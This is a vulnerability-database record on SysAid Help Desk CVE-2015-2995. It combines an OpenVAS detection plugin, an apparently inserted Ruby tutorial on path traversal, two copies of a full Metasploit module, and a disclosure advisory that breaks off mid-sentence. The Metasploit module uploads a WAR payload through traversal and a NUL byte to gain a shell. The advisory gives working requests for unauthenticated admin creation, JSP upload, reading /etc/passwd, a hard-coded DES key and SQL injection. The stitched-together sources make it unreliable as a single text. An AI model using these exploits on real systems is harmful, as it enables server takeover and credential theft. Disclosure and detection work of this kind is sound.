{"id": "OPENVAS:1361412562310106006", "type": "openvas", "bulletinFamily": "scanner", "title": "SysAid < 15.2 Unauthenticated File Upload Vulnerability", "description": "SysAid Help Desktop Software is prone to an unauthenticated\n file upload vulnerability", "published": "2015-06-11T00:00:00", "modified": "2020-04-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106006", "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "references": ["https://www.security-database.com/detail.php?alert=CVE-2015-2995"], "cvelist": ["CVE-2015-2995"], "lastseen": "2020-04-26T15:02:58", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-2995"]}, {"type": "exploitdb", "idList": ["EDB-ID:43885"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:731246BBF736D94C1AB6AB77C5502B82"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132138", "PACKETSTORM:132736", "PACKETSTORM:132760"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32179"]}, {"type": "zdt", "idList": ["1337DAY-ID-23705", "1337DAY-ID-23898"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2015-2995"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:731246BBF736D94C1AB6AB77C5502B82"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/SYSAID_RDSLOGS_FILE_UPLOAD"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132138"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32179"]}, {"type": "zdt", "idList": ["1337DAY-ID-23705"]}]}, "exploitation": null, "vulnersScore": 0.2}, "pluginID": "1361412562310106006", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SysAid Unauthenticated File Upload Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright 
(c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:sysaid:sysaid\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106006\");\n script_version(\"2020-04-23T05:44:42+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 05:44:42 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-06-11 10:02:43 +0700 (Thu, 11 Jun 2015)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2015-2995\");\n\n script_name(\"SysAid < 15.2 Unauthenticated File Upload Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_sysaid_detect.nasl\");\n script_mandatory_keys(\"sysaid/detected\");\n\n script_tag(name:\"summary\", value:\"SysAid Help Desktop Software is prone to an unauthenticated\n file upload vulnerability\");\n\n script_tag(name:\"vuldetect\", value:\"Determine if the vulnerable service 
is reachable and then\n check the version.\");\n\n script_tag(name:\"insight\", value:\"The vulnerability exists in the RdsLogsEntry servlet which\n accepts unauthenticated file uploads and handles zip file contents in an insecure way. Note that this\n will only work if the target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduce a protection\n against null byte injection in file names.\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker can upload arbitrary files which could\n lead to remote code execution.\");\n\n script_tag(name:\"affected\", value:\"SysAid Help Desktop version 15.1.x and before.\");\n\n script_tag(name:\"solution\", value:\"Update to version 15.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.security-database.com/detail.php?alert=CVE-2015-2995\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:FALSE ) ) exit( 0 );\nvers = infos[\"version\"];\ndir = infos[\"location\"];\n\nif( ! dir ) exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/rdslogs?rdsName=\" + rand_str(length:4);\nreq = string('POST ', url, ' HTTP/1.1\\r\\n',\n 'Host: ', get_host_name(), '\\r\\n\\r\\n');\nbuf = http_keepalive_send_recv(port: port, data: req);\n\nif (buf =~ \"HTTP/1\\.. 200\" && version_is_less(version: vers, test_version: \"15.2\")) {\n report = report_fixed_ver(installed_version: vers, fixed_version: \"15.2\", install_path: dir);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659978038, "score": 1659978368}, "_internal": {"score_hash": "17542a396dbca96f5b567a5650db4d60"}}
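The insight text in the OpenVAS record above names the two ingredients of CVE-2015-2995: an attacker-controlled rdsName that is joined onto a server-side path with no containment check, and a JVM old enough (Java 6, or 7 before 7u40) to let a NUL byte truncate that path when it reaches the OS. The Ruby block below is an added example, not code from the OpenVAS plugin, from the Metasploit module further down this page, or from SysAid: it models the vulnerable resolution next to a hardened one and runs the page's own payloads through both. The install layout under /opt/sysaid, the `<rdsName>/<timestamp>.zip` naming and every function name are assumptions made for the example; the servlet's real code is not on this page.

```ruby
# Added example (not the OpenVAS plugin, the Metasploit module or SysAid code):
# vulnerable versus hardened resolution of the rdsName query parameter.

# Assumed bundled-installer layout. Four "../" from the upload directory reach
# /opt/sysaid, so "../../../../tomcat/webapps/x.war" lands in Tomcat's webapps
# (the Metasploit module builds the same path with a doubled slash).
UPLOAD_DIR = '/opt/sysaid/tomcat/webapps/sysaid/rdslogs'.freeze
STAMP = '1421678611732'.freeze # fixed stand-in for the server's timestamp

# Vulnerable resolution (assumed naming scheme). rdsName is concatenated
# without any check, and the name is handed to the OS as a C string: on
# Java 6 and 7 up to 7u25 a NUL byte ends the name early, so the
# "/<timestamp>.zip" the server appends is silently discarded.
def vulnerable_upload_path(rds_name, stamp = STAMP)
  raw = "#{UPLOAD_DIR}/#{rds_name}/#{stamp}.zip"
  truncated = raw.split("\0", 2).first # what the C-level open() would see
  File.expand_path(truncated)
end

# Hardened resolution: reject NUL bytes outright (Java 7u40+ does this for
# you, but do not rely on the runtime), allow only a plain identifier, and
# still verify after canonicalisation that the result stays under UPLOAD_DIR.
def safe_upload_path(rds_name, stamp = STAMP)
  raise ArgumentError, 'NUL byte in rdsName' if rds_name.include?("\0")
  unless rds_name.match?(/\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/)
    raise ArgumentError, "rdsName is not a plain identifier: #{rds_name.inspect}"
  end
  candidate = File.expand_path("#{rds_name}/#{stamp}.zip", UPLOAD_DIR)
  unless candidate.start_with?("#{UPLOAD_DIR}/")
    raise ArgumentError, 'resolved path escapes the upload directory'
  end
  candidate
end

# Runs a benign name plus the payloads from the advisory and the Metasploit
# module through both resolvers; returns {payload => [vulnerable, hardened]}.
def compare_resolvers
  payloads = [
    'agent01',                                # benign agent name (constructed)
    "../../../../tomcat/webapps/evil.war\0",  # Metasploit-style WAR drop
    "../../../../sample.war\0",               # the advisory's own request
    '../../../../sample.war',                 # no NUL: traversal still works,
  ]                                           # only the .zip suffix survives
  payloads.each_with_object({}) do |p, out|
    hardened = begin
      safe_upload_path(p)
    rescue ArgumentError => e
      "rejected: #{e.message}"
    end
    out[p] = [vulnerable_upload_path(p), hardened]
  end
end

if __FILE__ == $PROGRAM_NAME
  compare_resolvers.each do |p, (vuln, hardened)|
    puts "#{p.inspect}\n  vulnerable -> #{vuln}\n  hardened   -> #{hardened}"
  end
end
```

The last payload is the one worth remembering when reading the "Java 7u40 and above" caveat: removing NUL-byte support only stops the attacker from choosing the file extension; the `../` traversal itself is untouched, which is why the hardened version whitelists the name and checks containment rather than merely stripping NULs.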
{"packetstorm": [{"lastseen": "2016-12-05T22:22:31", "description": "", "cvss3": {}, "published": "2015-07-20T00:00:00", "type": "packetstorm", "title": "SysAid Help Desk 'rdslogs' Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2995"], "modified": "2015-07-20T00:00:00", "id": "PACKETSTORM:132760", "href": "https://packetstormsecurity.com/files/132760/SysAid-Help-Desk-rdslogs-Arbitrary-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => \"SysAid Help Desk 'rdslogs' Arbitrary File Upload\", \n'Description' => %q{ \nThis module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. \nThe vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated \nfile uploads and handles zip file contents in an insecure way. By combining both weaknesses, \na remote attacker can accomplish remote code execution. Note that this will only work if the \ntarget is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection \nagainst null byte injection in file names. This module has been tested successfully on version \nv14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid \nseems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability \nfrom being exploited. 
\n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2015-2995' ], \n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ], \n[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ] \n], \n'DefaultOptions' => { 'WfsDelay' => 30 }, \n'Privileged' => false, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jun 3 2015')) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptInt.new('SLEEP', \n[true, 'Seconds to sleep while we wait for WAR deployment', 15]), \nOptString.new('TARGETURI', \n[true, 'Base path to the SysAid application', '/sysaid/']) \n], self.class) \nend \n \n \ndef check \nservlet_path = 'rdslogs' \nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) \n \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'vars_get' => { \n'rdsName' => bogus_file \n} \n}) \n \nif res && res.code == 200 \nreturn Exploit::CheckCode::Detected \nend \nend \n \n \ndef exploit \napp_base = rand_text_alphanumeric(4 + rand(32 - 4)) \ntomcat_path = '../../../../' \nservlet_path = 'rdslogs' \n \n# We need to create the upload directories before our first attempt to upload the WAR. 
\nprint_status(\"#{peer} - Creating upload directory\") \nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) \nsend_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))), \n'ctype' => 'application/xml', \n'vars_get' => { \n'rdsName' => bogus_file \n} \n}) \n \nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s \n \n# We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail \nprint_status(\"#{peer} - Uploading WAR file...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'data' => Zlib::Deflate.deflate(war_payload), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'rdsName' => \"#{tomcat_path}/tomcat/webapps/#{app_base}.war\\x00\" \n} \n}) \n \n# The server either returns a 200 OK when the upload is successful. \nif res && res.code == 200 \nprint_status(\"#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment\") \nregister_files_for_cleanup(\"tomcat/webapps/#{app_base}.war\") \nelse \nfail_with(Failure::Unknown, \"#{peer} - WAR upload failed\") \nend \n \n10.times do \nselect(nil, nil, nil, 2) \n \n# Now make a request to trigger the newly deployed war \nprint_status(\"#{peer} - Attempting to launch payload in deployed WAR...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), \n'method' => 'GET' \n}) \n# Failure. The request timed out or the server went away. \nbreak if res.nil? \n# Success! 
Triggered the payload, should have a shell incoming \nbreak if res.code == 200 \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132760/sysaid_rdslogs_file_upload.rb.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:20:08", "description": "", "cvss3": {}, "published": "2015-07-17T00:00:00", "type": "packetstorm", "title": "SysAid Help Desk 'rdslogs' Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2995"], "modified": "2015-07-17T00:00:00", "id": "PACKETSTORM:132736", "href": "https://packetstormsecurity.com/files/132736/SysAid-Help-Desk-rdslogs-Arbitrary-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => \"SysAid Help Desk 'rdslogs' Arbitrary File Upload\", \n'Description' => %q{ \nThis module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. \nThe vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated \nfile uploads and handles zip file contents in an insecure way. Combining both weaknesses \na remote attacker can accomplish remote code execution. Note that this will only work if the \ntarget is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduce a protection \nagainst null byte injection in file names. This module has been tested successfully on version \nv14.3.12 b22 and v14.4.32 b25 in Linux. 
In theory this module also works on Windows, but SysAid \nseems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability \nfrom being exploited. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2015-2995' ], \n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ], \n[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ] \n], \n'DefaultOptions' => { 'WfsDelay' => 30 }, \n'Privileged' => false, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jun 3 2015')) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptInt.new('SLEEP', \n[true, 'Seconds to sleep while we wait for WAR deployment', 15]), \nOptString.new('TARGETURI', \n[true, 'Base path to the SysAid application', '/sysaid/']) \n], self.class) \nend \n \n \ndef check \nservlet_path = 'rdslogs' \nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) \n \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'vars_get' => { \n'rdsName' => bogus_file \n} \n}) \n \nif res && res.code == 200 \nreturn Exploit::CheckCode::Detected \nend \nend \n \n \ndef exploit \napp_base = rand_text_alphanumeric(4 + rand(32 - 4)) \ntomcat_path = '../../../../' \nservlet_path = 'rdslogs' \n \n# We need to create the upload directories before our first attempt to upload the WAR. 
\nprint_status(\"#{peer} - Creating upload directory\") \nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) \nsend_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))), \n'ctype' => 'application/xml', \n'vars_get' => { \n'rdsName' => bogus_file \n} \n}) \n \nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s \n \n# We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail \nprint_status(\"#{peer} - Uploading WAR file...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'data' => Zlib::Deflate.deflate(war_payload), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'rdsName' => \"#{tomcat_path}/tomcat/webapps/#{app_base}.war\\x00\" \n} \n}) \n \n# The server either returns a 200 OK when the upload is successful. \nif res && res.code == 200 \nprint_status(\"#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment\") \nregister_files_for_cleanup(\"tomcat/webapps/#{app_base}.war\") \nelse \nfail_with(Failure::Unknown, \"#{peer} - WAR upload failed\") \nend \n \n10.times do \nselect(nil, nil, nil, 2) \n \n# Now make a request to trigger the newly deployed war \nprint_status(\"#{peer} - Attempting to launch payload in deployed WAR...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), \n'method' => 'GET' \n}) \n# Failure. The request timed out or the server went away. \nbreak if res.nil? \n# Success! 
Triggered the payload, should have a shell incoming \nbreak if res.code == 200 \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132736/sysaid_rdslogs_fle_upload.rb.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:17:55", "description": "", "cvss3": {}, "published": "2015-06-03T00:00:00", "type": "packetstorm", "title": "SysAid Help Desk 14.4 Code Execution / Denial Of Service / Traversal / SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2996", "CVE-2015-2994", "CVE-2015-3000", "CVE-2015-3001", "CVE-2015-2999", "CVE-2015-2993", "CVE-2015-2997", "CVE-2015-2995", "CVE-2015-2998"], "modified": "2015-06-03T00:00:00", "id": "PACKETSTORM:132138", "href": "https://packetstormsecurity.com/files/132138/SysAid-Help-Desk-14.4-Code-Execution-Denial-Of-Service-Traversal-SQL-Injection.html", "sourceData": "`Hi, \n \ntl;dr Found lots of vulns in SysAid Help Desk 14.4, including RCE. \nSysAid have informed me they all have been fixed in 15.2, but no \nre-test was performed. \n \nFull advisory below, and a copy can be obtained at [1]. \n5 Metasploit modules have been released and currently awaiting merge \nin the moderation queue [2]. 
\n \nRegards, \nPedro \n \n[1]: https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt \n[2]: \nhttps://github.com/rapid7/metasploit-framework/pull/5470 \nhttps://github.com/rapid7/metasploit-framework/pull/5471 \nhttps://github.com/rapid7/metasploit-framework/pull/5472 \nhttps://github.com/rapid7/metasploit-framework/pull/5473 \nhttps://github.com/rapid7/metasploit-framework/pull/5474 \n \n>> Multiple vulnerabilities in SysAid Help Desk 14.4 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n================================================================================= \nDisclosure: 03/06/2015 / Last updated: 03/06/2015 \n \n>> Background on the affected product: \n\"SysAid is an ITSM solution that offers all the essentials, with \neverything you need for easy and efficient IT support and effective \nhelp desk operations. Its rich set of features includes a powerful \nservice desk, asset management and discovery, self-service, and \neasy-to-use tools for understanding and optimizing IT performance.\" \n \nMetasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been \nreleased and should be integrated in the Metasploit framework soon. \nAll vulnerabilities affect both the Windows and Linux versions unless \notherwise noted. \n \n \n>> Technical details: \n1) \nVulnerability: Administrator account creation \nCVE-2015-2993 (same CVE as #10) \nConstraints: none; no authentication or any other information needed \nAffected versions: unknown, at least 14.4 \n \nGET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123 \n \nThis creates an account with the following credentials: mr_lit:secret \nNote that this vulnerability only seems to be exploitable ONCE! \nSubsequent attempts to exploit it will fail even if the tomcat server \nis restarted. 
\n \n \n2) \nVulnerability: File upload via directory traversal (authenticated; \nleading to remote code execution) \nCVE-2015-2994 \nConstraints: valid administrator account needed (see #1 to create a \nvalid admin account) \nAffected versions: unknown, at least 14.4 \n \n \nPOST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1 \nContent-Type: multipart/form-data; \nboundary=---------------------------81351919525780 \n \n-----------------------------81351919525780 \nContent-Disposition: form-data; name=\"activation\"; filename=\"whatevs.jsp\" \nContent-Type: application/octet-stream \n \n<html><body><%out.println(System.getProperty(\"os.name\"));%></body><html> \n-----------------------------81351919525780-- \n \n \nThe response returns a page which contains the following: \nvar imageUrl = \n\"icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501\"; \nvar thumbUrl = \n\"icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501\"; \nif(imageUrl != null && $.trim(imageUrl).length > 0) \n{ \ndocument.getElementById(\"cropbox\").src = imageUrl; \ndocument.getElementById(\"preview\").src = thumbUrl; \nparent.glSelectedImageUrl = \n\"icons/user_photo/14222767515000.1049804910604456_temp.jsp\"; \n \nGo to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp \nto execute the JSP. \n \n \n3) \nVulnerability: File upload via directory traversal (unauthenticated; \nleading to remote code execution) \nCVE-2015-2995 \nConstraints: no authentication or any other information needed. The \nserver has to be running Java 7u25 or lower. This is because Java 7u40 \n(FINALLY!) rejects NULL bytes in file paths. See \nhttp://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more \ndetails. \nAffected versions: unknown, at least 14.3 and 14.4 \n \nPOST /sysaid/rdslogs?rdsName=../../../../sample.war%00 \n<... 
WAR payload here ...> \n \n \n4) \nVulnerability: Arbitrary file download \nCVE-2015-2996 (same CVE as #8) \nConstraints: none; no authentication or any other information needed \n(see #5 to obtain the traversal path) \nAffected versions: unknown, at least 14.4 \n \nGET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd \n \n \n5) \nVulnerability: Path disclosure \nCVE-2015-2997 \nConstraints: none; no authentication or any other information needed \nAffected versions: unknown, at least 14.4; only works on the Linux version \n \nPOST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters> \n \nMetasploit PoC: \n \nlarge_traversal = '../' * rand(15...30) \nservlet_path = 'getAgentLogFile' \n \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'data' => \nZlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + \nrand(300))), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'accountId' => large_traversal + \nRex::Text.rand_text_alphanumeric(8 + rand(10)), \n'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10)) \n} \n}) \n \nThe response (res.body.to_s) will be similar to: \n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"> \n<HTML> \n<HEAD><TITLE>Error</TITLE></HEAD> \n<BODY> \n<H1>Internal Error No#14</H1> \n<H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip \n(Permission denied)</H2> \n</BODY></HTML> \n \nThe tomcat path is revealed between the H2 tags. \n \n \n6) \nVulnerability: Use of hard-coded cryptographic key \nCVE-2015-2998 \nConstraints: N/A \nAffected versions: unknown, at least 14.4 \n \nSysAid Help Desk uses a hard-coded encryption key and encryption \nparameters. 
If this is combined with an arbitrary file download \nvulnerability (such as #4), a malicious user can then decrypt the \ndatabase password by downloading the WEB-INF/conf/serverConf.xml file. \nAlgorithm: DES password based encryption with MD5 hash \nKey: \"inigomontoya\" \nSalt: [-87, -101, -56, 50, 86, 53, -29, 3] \nIterations: 19 \n \n \n7) \nVulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp \nCVE-2015-2999 \nConstraints: valid administrator account needed \nAffected versions: unknown, at least 14.4 \n \na) \nPOST /sysaid/genericreport HTTP/1.1 \naction=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin \n \nParameters: \ngroupFilter \n \naction=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no \n \nParameters: \ncustomSQL \n \naction=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin \n \nParameters: \ncustomSQL \n \n(3 different payloads are shown 
because the reportName parameter seems \nto change which parameters have the injection) \n \n \nb) \nPOST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE \nresizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo= \n \nParameter: \ndir \n \n \nc) \nPOST /sysaid/RFCGantt.jsp HTTP/1.1 \nlistName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true \n \nAccepts injection between $$ in 
